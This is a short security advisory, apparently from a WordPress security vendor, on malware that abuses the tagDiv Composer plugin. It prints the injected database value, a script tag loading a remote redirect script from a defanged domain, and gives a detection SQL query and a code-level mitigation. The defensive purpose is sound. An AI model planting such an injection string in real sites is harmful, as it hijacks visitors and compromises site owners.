A vulnerability in tagDiv Composer, a plugin included with the WordPress Newspaper theme, has been discovered that allows the database to be rewritten.


Characteristics of the malware

This malware writes the following string to the key td_live_css_local_storage in the wp_options table in the database.

*Some parts are enclosed in parentheses for safety.

a:2:{i:0;s:0:\"\";s:3:\"css\";s:175:\".stepkokkmnkivhrwppnn{} .step4636435346{}</style><script>var a=1;var b=2;var c=4;&lt ;/script><script src='https://four.startperfectsolutions[.]com/scripts/sold.js\'></script><style>\"}

This string is output to the site header and the site redirects (forces a move) to another site.

startperfectsolutions “.” com/scripts/sold.js part is the body of the malware that performs redirect hacks and other malicious behavior on the site. This script is loaded on the site and causes the malicious behavior.

How to deal with malware

This malware is a very rare type of malware that writes to the database.
The key td_live_css_local_storage is a key created by the tagDiv Composer plugin, so it probably exploits a vulnerability in this plugin.

[Free] WordPress:Malware Scan & Security Plugin [Malware and Virus Detection and Removal].

However, there are various patterns of malware database modification, and if the pattern has not yet been added to our database, the plugin may not be able to detect it.

In this case, it is necessary to issue SQL statements directly to the database to check the malware infection status.

Example of SQL statement
select option_value from wp_options where option_name = 'td_live_css_local_storage'; 

Update or stop using tagDiv Composer

Since multiple vulnerabilities have been reported in tagDiv Composer, please consider stopping the use of tagDiv Composer if you are unable to update it.

The vulnerability mentioned above can be prevented by commenting out the part of the plugin that writes some settings to the database, as shown below, but this may limit the functionality of the plugin since the plugin settings cannot be saved.

File \wp-content\plugins\td-composer\css-live\includes\td_live_css_storage.php
*Adding // at the beginning of the line and commenting it out will prevent this code section from working and prevent the database from being rewritten.

//update_option('td_live_css_local_storage', self::$local_storage);